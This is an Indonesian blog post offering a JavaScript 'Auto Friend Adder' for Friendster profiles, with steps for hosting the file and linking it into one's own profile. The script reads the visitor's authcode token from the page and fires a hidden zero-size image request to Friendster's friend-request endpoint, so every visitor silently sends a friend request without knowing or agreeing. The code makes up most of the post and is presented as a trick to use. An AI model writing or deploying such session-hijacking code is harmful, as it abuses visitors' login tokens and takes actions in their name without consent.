tambah temen otomatis

trick cara menambah teman secara otomatis, dengan memakai trik ini maka setiap pengunjung yang melihat profil fs anda akan secara otomatis direquest untuk menjadi teman anda. 

ini dia codenya : 

//Auto Friend Adder
var afaimg = document.createElement('span');
afaimg.id = "addme";
document.getElementsByTagName('head')[0].appendChild(afaimg);

function afa() {
var eadd = "alamt_email_kamu";
var k = document.getElementById("controlPanelButtons").innerHTML;
var a = k.slice(k.indexOf("authcode="));
var m = a.slice(9,39);
document.getElementById("addme").innerHTML = "<img src=\"http://www.friendster.com/addfriendrequest.php?authcode="+m+"&uid="+pageOwnerID+"&email="+eadd+"&firstname=&lastname=&friend=&submit=1\" width=\"0\" height=\"0\" />";
}
if (!attachOnLoadHandler(function() { afa();})) window.onload = function() { afa();};

copy code diatas ke notepad

nach kalau dach dicopy...

ganti tulisan merahnya dengan e-mail login fs kalian....... simpan nengan format file ".js" contaoh : contoh.js

trus kalian upload ke file hosting kalian....

lalu linkerkan file trsebut ke fs kalian....

Category:  
You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response.
0 Responses
Leave a Reply